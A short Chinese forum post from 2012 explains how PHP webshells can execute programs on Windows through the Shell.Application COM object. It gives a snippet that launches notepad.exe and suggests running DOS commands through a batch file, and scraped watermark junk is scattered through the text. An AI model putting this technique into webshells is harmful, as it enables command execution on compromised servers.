关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。% m* x7 G5 R1 G6 x! D
) c& {3 i+ q) o4 S1 P. V# v
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法4 u, B1 u8 p- O- g& K: J
' }6 ~( N* z8 M5 m. {+ w$ x
<?php" i- s j1 t" U7 J- ~: k% ^
$wsh = new COM('Shell.Application') or die("Shell.Application");% f3 t9 J6 v, z4 E7 n( i
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");, m7 z9 L0 }0 ]: _/ u' a7 h4 y6 V
//没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。% I) N o: b% c# I1 `2 M
?>
9 u( N! m c% b: `, D, Q# i7 r0 g1 ^2 N+ X0 W z6 O
xp+APMServ5.2.0测试通过。
! Z, X z2 E2 y7 m9 V6 q |
发表于 2012-9-15 14:29:01
收藏
分享
支持
反对